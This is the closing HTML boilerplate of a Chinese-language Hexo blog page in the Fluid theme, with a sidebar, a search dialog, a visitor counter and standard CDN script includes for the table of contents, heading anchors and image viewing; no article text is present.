  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    
  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
